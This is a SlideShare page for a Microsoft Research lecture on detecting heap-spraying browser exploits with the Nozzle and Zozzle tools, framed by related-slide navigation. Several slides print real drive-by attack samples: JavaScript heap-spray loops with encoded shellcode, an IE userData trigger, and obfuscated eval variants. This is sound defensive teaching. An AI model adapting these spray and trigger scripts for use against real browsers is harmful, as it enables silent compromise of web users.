DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...Felipe Prado
 
owasp lithuania chapter - exploit vs anti-exploit
owasp lithuania chapter - exploit vs anti-exploitowasp lithuania chapter - exploit vs anti-exploit
owasp lithuania chapter - exploit vs anti-exploitKęstutis Meškonis
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
 
Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assemblyShakacon
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!Ortus Solutions, Corp
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
Using Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systemsUsing Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systemsSerge Stinckwich
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Get Ahead with HTML5 on Moible
Get Ahead with HTML5 on MoibleGet Ahead with HTML5 on Moible
Get Ahead with HTML5 on Moiblemarkuskobler
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Patrick Chanezon
 

Ähnlich wie 20101017 program analysis_for_security_livshits_lecture04_nozzle (20)

Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
JS performance tools
JS performance toolsJS performance tools
JS performance tools
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
 
owasp lithuania chapter - exploit vs anti-exploit
owasp lithuania chapter - exploit vs anti-exploitowasp lithuania chapter - exploit vs anti-exploit
owasp lithuania chapter - exploit vs anti-exploit
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
 
HTML5 video filters
HTML5 video filtersHTML5 video filters
HTML5 video filters
 
Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
 
CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
Using Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systemsUsing Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systems
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Get Ahead with HTML5 on Moible
Get Ahead with HTML5 on MoibleGet Ahead with HTML5 on Moible
Get Ahead with HTML5 on Moible
 
Sjug aug 2010_cloud
Sjug aug 2010_cloudSjug aug 2010_cloud
Sjug aug 2010_cloud
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
 

Mehr von Computer Science Club

20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugsComputer Science Club
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugsComputer Science Club
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugsComputer Science Club
 
20140511 parallel programming_kalishenko_lecture12
20140511 parallel programming_kalishenko_lecture1220140511 parallel programming_kalishenko_lecture12
20140511 parallel programming_kalishenko_lecture12Computer Science Club
 
20140427 parallel programming_zlobin_lecture11
20140427 parallel programming_zlobin_lecture1120140427 parallel programming_zlobin_lecture11
20140427 parallel programming_zlobin_lecture11Computer Science Club
 
20140420 parallel programming_kalishenko_lecture10
20140420 parallel programming_kalishenko_lecture1020140420 parallel programming_kalishenko_lecture10
20140420 parallel programming_kalishenko_lecture10Computer Science Club
 
20140413 parallel programming_kalishenko_lecture09
20140413 parallel programming_kalishenko_lecture0920140413 parallel programming_kalishenko_lecture09
20140413 parallel programming_kalishenko_lecture09Computer Science Club
 
20140329 graph drawing_dainiak_lecture02
20140329 graph drawing_dainiak_lecture0220140329 graph drawing_dainiak_lecture02
20140329 graph drawing_dainiak_lecture02Computer Science Club
 
20140329 graph drawing_dainiak_lecture01
20140329 graph drawing_dainiak_lecture0120140329 graph drawing_dainiak_lecture01
20140329 graph drawing_dainiak_lecture01Computer Science Club
 
20140310 parallel programming_kalishenko_lecture03-04
20140310 parallel programming_kalishenko_lecture03-0420140310 parallel programming_kalishenko_lecture03-04
20140310 parallel programming_kalishenko_lecture03-04Computer Science Club
 
20140216 parallel programming_kalishenko_lecture01
20140216 parallel programming_kalishenko_lecture0120140216 parallel programming_kalishenko_lecture01
20140216 parallel programming_kalishenko_lecture01Computer Science Club
 

Mehr von Computer Science Club (20)

20141223 kuznetsov distributed
20141223 kuznetsov distributed20141223 kuznetsov distributed
20141223 kuznetsov distributed
 
Computer Vision
Computer VisionComputer Vision
Computer Vision
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
 
20140511 parallel programming_kalishenko_lecture12
20140511 parallel programming_kalishenko_lecture1220140511 parallel programming_kalishenko_lecture12
20140511 parallel programming_kalishenko_lecture12
 
20140427 parallel programming_zlobin_lecture11
20140427 parallel programming_zlobin_lecture1120140427 parallel programming_zlobin_lecture11
20140427 parallel programming_zlobin_lecture11
 
20140420 parallel programming_kalishenko_lecture10
20140420 parallel programming_kalishenko_lecture1020140420 parallel programming_kalishenko_lecture10
20140420 parallel programming_kalishenko_lecture10
 
20140413 parallel programming_kalishenko_lecture09
20140413 parallel programming_kalishenko_lecture0920140413 parallel programming_kalishenko_lecture09
20140413 parallel programming_kalishenko_lecture09
 
20140329 graph drawing_dainiak_lecture02
20140329 graph drawing_dainiak_lecture0220140329 graph drawing_dainiak_lecture02
20140329 graph drawing_dainiak_lecture02
 
20140329 graph drawing_dainiak_lecture01
20140329 graph drawing_dainiak_lecture0120140329 graph drawing_dainiak_lecture01
20140329 graph drawing_dainiak_lecture01
 
20140310 parallel programming_kalishenko_lecture03-04
20140310 parallel programming_kalishenko_lecture03-0420140310 parallel programming_kalishenko_lecture03-04
20140310 parallel programming_kalishenko_lecture03-04
 
20140223-SuffixTrees-lecture01-03
20140223-SuffixTrees-lecture01-0320140223-SuffixTrees-lecture01-03
20140223-SuffixTrees-lecture01-03
 
20140216 parallel programming_kalishenko_lecture01
20140216 parallel programming_kalishenko_lecture0120140216 parallel programming_kalishenko_lecture01
20140216 parallel programming_kalishenko_lecture01
 
20131106 h10 lecture6_matiyasevich
20131106 h10 lecture6_matiyasevich20131106 h10 lecture6_matiyasevich
20131106 h10 lecture6_matiyasevich
 
20131027 h10 lecture5_matiyasevich
20131027 h10 lecture5_matiyasevich20131027 h10 lecture5_matiyasevich
20131027 h10 lecture5_matiyasevich
 
20131027 h10 lecture5_matiyasevich
20131027 h10 lecture5_matiyasevich20131027 h10 lecture5_matiyasevich
20131027 h10 lecture5_matiyasevich
 
20131013 h10 lecture4_matiyasevich
20131013 h10 lecture4_matiyasevich20131013 h10 lecture4_matiyasevich
20131013 h10 lecture4_matiyasevich
 
20131006 h10 lecture3_matiyasevich
20131006 h10 lecture3_matiyasevich20131006 h10 lecture3_matiyasevich
20131006 h10 lecture3_matiyasevich
 
20131006 h10 lecture3_matiyasevich
20131006 h10 lecture3_matiyasevich20131006 h10 lecture3_matiyasevich
20131006 h10 lecture3_matiyasevich
 

20101017 program analysis_for_security_livshits_lecture04_nozzle

  • 1. Finding Malware on a Web Scale Ben Livshits Microsoft Research Redmond, WA
  • 2. Stack-based buffer overruns 1995 Heap-based buffer overruns 2002 Heap sprays 2005 Brief History of Memory-Based Exploits 2
  • 4. <html> <body> <button id=’butid’ onclick=’trigger();’ style=’display:none’/> <script> // Shellcode var shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u563 bigblock=unescape(‚%u0D0D%u0D0D‛); headersize=20;shellcodesize=headersize+shellcode.length; while(bigblock.length<shellcodesize){bigblock+=bigblock;} heapshell=bigblock.substring(0,shellcodesize); nopsled=bigblock.substring(0,bigblock.length-shellcodesize); while(nopsled.length+shellcodesize<0 25000){nopsled=nopsled+nopsled+heapshell} // Spray var spray=new Array(); for(i=0;i<500;i++){spray[i]=nopsled+shellcode;} // Trigger function trigger(){ var varbdy = document.createElement(‘body’); varbdy.addBehavior(‘#default#userData’); document.appendChild(varbdy); try { for (iter=0; iter<10; iter++) { varbdy.setAttribute(‘s’,window); } } catch(e){ } window.status+=‛; } document.getElementById(‘butid’).onclick(); </script> </body> </html> 4
  • 6. Research to Reality in 15 Short Months От идеи до продукта May 2009 – October 2010 6
  • 7. Heap Sprays • Targets web users through the browser • Focus on prevention • Wanted it to run in the browser May 2009 8
  • 8. Challenges • False positives • False negatives • Performance overhead June 2009 9
  • 9. August -- March 2009 Nozzle • Combination of runtime and static analysis • Low false positives • Low false negatives • 5-15% overhead • Paper in UsenixSec ‘09 10
  • 10. 5-15% is too high April 2009 • Browser landscape is very competitive performance-wise 11
  • 11. Offline Scanning • Help from Bing • Finds malware on the January 2010 web • Can scan a large number of URLs 12
  • 13. End of Historical Digression 14
  • 15. Drive-By Heap Spraying (2) ASLR prevents the Program Heap attack ok bad PC Creates the ok malicious object <HTML> <SCRIPT language="text/javascript"> Triggers the jump shellcode = unescape("%u4343%u4343%...''); </SCRIPT> <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC … &#3341;&#3341;"> </IFRAME> </HTML> 16
  • 16. Drive-By Heap Spraying (3) Program Heap ok bad bad bad bad bad ok bad <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); Allocate 1,000s of var fullblock = oneblock; while (fullblock.length<0x40000) { malicious objects fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT> 17
  • 17. Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad 18
  • 18. Local Malicious Object Detection Is this object dangerous? Code or Data? 000000000000 add [eax], al • Is this object code? 000000000000 add [eax], al – Code and data look the same on x86 000000000000 add [eax], al 000000000000 NOP add [eax], al • Focus on sled detection 000000000000 add [eax], al 000000000000 add [eax], al – Majority of object is sled 000000000000 sled add [eax], al – Spraying scripts build simple sleds • Is this code a NOP sled? 0101010101 and ah, [edx] – Previous techniques do not look at heap 0101010101 and ah, [edx] 0101010101 and ah, [edx] – Many heap objects look like NOP sleds 0101010101 and ah, [edx] – 80% false positive rates using previous 0101010101 shellcode and ah, [edx] 0101010101 and ah, [edx] techniques 0101010101 and ah, [edx] • Need stronger local techniques 19
  • 19. Object Surface Area Calculation (1) • Assume: attacker wants to reach shell code from jump to any point in object • Goal: find blocks that are likely to be reached via control flow • Strategy: use dataflow analysis to compute “surface area” of each block An example object from visiting google.com 20
  • 20. Object Surface Area Calculation (2) 4 4 12 • Each block starts with its own size as weight • Weights are propagated forward with flow 2 6 12 • Invalid blocks don’t propagate 4 10 12 39 15 • Iterate until a fixpoint is reached 2 12 12 • Compute block with highest weight 2 14 14 An example object from visiting google.com 21
  • 21. Nozzle Global Heap Metric Normalize to (approx): P(jump will cause exploit) NSA(H) obj build CFG Legend: sub [eax], eax arithmatic adc dh, bh memory or eax, 0d172004h SA(H) Bi I/O or syscall in eax, 0x11 control flow test cl, ah jecxz 021c7fd8 Compute threat add [eax], al add [ecx], 0 add al, 30h add al, 80h outs dx, [esi] add al, 38h of entire heap jecxz 021c7fde xor [eax], eax To target block imul eax, [eax], 6ch dataflow or eax, 0d179004h SA(o) SA(Bi) Compute threat of Compute threat of single block single object 22
  • 22. Nozzle Experimental Summary 0 False Positives • 10 popular AJAX-heavy sites • 150 top Web sites 0 False Negatives • 12 published heap spraying exploits and • 2,000 synthetic rogue pages generated using Metasploit Runtime Overhead • As high as 2x without sampling • 5-10% with sampling 23
  • 25. What do we do with all this data? 26
  • 26. Obfuscation eval(""+O(2369522)+O(1949494)+O eval(l(79)+l(61)+l(102)+l(117)+ OlOlll="(x)"; var l = function(x) { (2288625)+O(648464)+O(2304124)+ l(110)+l(99)+l(116)+l(105)+l(11 OllOlO=" String"; return String.fromCharCode(x); O(2080995)+O(2020710)+O(2164958 1)+l(110)+l(40)+l(109)+l(41)+l( OlllOO="tion"; } )+O(2168902)+O(1986377)+O(22279 123)+l(114)+l(101)+l(116)+l(117 OlOllO="Code(x)}"; 03)+O(2005851)+O(2021303)+O(646 )+l(114)+l(110)+l(32)+l(83)+l(1 var O = function(m){ OllOOO="Char"; return String.fromCharCode( 435)+O(1228455)+O(644519)+O(234 16)+l(114)+l(105)+l(110)+l(103) OlllOl="func"; Math.floor(m / 10000) / 2); 6826)+O(2207788)+O(2023127)+O(2 +l(46)+l(102)+l(114)+l(111)+l(1 } OllllO=" l = "; 306806)+O(1983560)+O(1949296)+O 09)+l(67)+l(104)+l(97)+l(114)+l OllOOl=".from"; (2245968)+O(2028685)+O(809214)+ (67)+l(111)+l(100)+l(101)+l(40) shellcode = unescape("%u54EB%u758B…"); OllOll="{return"; O(680960)+O(747602)+O(2346412)+ +l(77)+l(97)+l(116)+l(104)+l(46 var bigblock = unescape("%u0c0c%u0c0c"); Olllll="var"; O(1060647)+O(1045327)+O(1381007 )+l(102)+l(108)+l(111)+l(111)+l while(bigblock.length<slackspace) { eval(Olllll+OllllO+OlllOl+OlllO )+O(1329180)+O(745897)+O(234140 (114)+l(40)+l(109)+l(47)+l(49)+ bigblock += bigblock; O+OlOlll+OllOll+OllOlO+OllOOl+O 4)+O(1109791)+O(1064283)+O(1128 l(48)+l(48)+l(48)+l(48)+l(41)+l } llOOO+OlOllO); block = bigblock.substring(0, 719)+O(1321055)+O(748985)+...); (47)+l(50)+l(41)+l(59)+l(125)); bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; } memory = new Array(); for(x=0; x<300; x++) { memory[x] = block + shellcode; 27 …
  • 27. Drive By Detection • Nozzle Visit a page and let it run • • for new processesZozzle WatchObserve the page as it runs • Handle infection a heapcode before it runs • Watch for the spray • Examine – Detect•inWhen suspect code is found • Kill the script before the a VM – Run vulnerability is triggered antivirus – Terminate the page OR – Enable other detection var she var spray for(i=0; mechanisms memory[ document. 28
  • 28. Detection Techniques Drive By Detection Nozzle Zozzle Certainty Performance Timeliness of Detection Hit Rate 29
  • 29. 10% 15% 20% 25% 30% 35% 0% 5% MAL003 29.7% MAL004 29.7% Unique Exploits Discovered MAL036 9.7% 0 2 4 6 8 12 14 16 18 10 0 MAL033 7.7% MAL035 3.9% MAL032 3.2% 20 MAL039 2.6% MAL001 1.9% 40 MAL006 1.9% MAL031 1.9% 60 MAL034 1.9% MAL011 1.3% MAL037 1.3% 80 MAL040 1.3% Most attacks look like this Malicious URLs Examined MAL005 0.6% 100 MAL009 0.6% MAL038 0.6% 120 We don’t find many new attacks Can We Detect Attacks Statically? 140 30
  • 30. shellcode = unescape("%u54EB%u758B…"); Deobfuscation var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; Hierarchical Feature Extraction } block = bigblock.substring(0, bigblock.length-slackspace); Naïve Bayes Classification eval(""+O(2369522)+O(19494 while(block.length+slackspace<0x40000) { } block = block + block + fillblock; 94)+O(2288625)+O(648464)+O (2304124)+O(2080995)+O(202 memory = function new Array(); 0710)+O(2164958)+O(2168902 Feature )+O(1986377)+O(2227903)+O( P(malicious) 2005851)+O(2021303)+O(6464 35)+O(1228455)+O(644519)+O string:0c0c (2346826)+O(2207788)+O(202 0.99 Deobfuscator 3127)+O(2306806)+O(1983560 = function:shellcode )+O(1949296)+O(2245968)+O( 0.99 loop 2028685)+O(809214)+O(68096 function:shellcode JavaScript loop:memory 0)+O(747602)+O(2346412)+O( 0.87 Runtime 1060647)+O(1045327)+O(1381 007)+O(1329180)+O(745897)+ abcabcabcabcabc O(2341404)+O(1109791)+O(10 0.80 64283)+O(1128719)+O(132105 = shellcode string loop:memory try:activex 5)+O(748985)+...); 0.41 string:%u0c0c%u0909… * P(malicious) loop:block if:msie 7 0.33 abcabcabcabcabcabc 0.21 %u0c0c%u0909… memory block function:unescape 0.45 abcabcabcabcabcabc 0.55 loop:nop 0.95 31
  • 31. The Zozzle Ecosystem Server Side (Microsoft) Browser Side Classifier Classifier Classifier Classifier 32
  • 32. Feature Selection False Positives False Negatives 25% 25% 20% 20% Classifier False Negative Rate Classifier False Positive Rate 15% 15% 10% 10% 5% 5% 0% 0% 0% 5% 10% 15% 0% 5% 10% 15% Training Set Size Training Set Size Hand-Picked Automatic Hand-Picked Automatic 33
  • 34. shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…"); var memory = []; var spraySize = "548864" - shellcode.length * "2"; var nop = unescape("%u0c0c%u0c0c"); while (nop.length < spraySize / "2") { nop += nop; } var nops = nop.substring("0", spraySize / "2"); Zozzle can automatically delete nop; for(i = "0"; i < "270"; i++) { identify components of an } memory[i] = nops + nops + shellcode; function payload() attack. { var body = document.createElement("BODY"); body.addBehavior("#default#userData"); document.appendChild(body); try { for(i = "0"; i < "10"; i++) { body.setAttribute("s", window); } } catch(e) { Shellcode } window.status += ""; } Spray document.getElementById("bo").onclick(); Vulnerability 35
  • 35. Summary Heap spraying attacks are • Easy to implement, easy to retarget • In widespread use Nozzle • Effectively detects published attacks (known and new) • Has acceptable runtime overhead • Can be used both online and offline Zozzle is a static detection solution • Fast and scalable • Accurate and powerful 36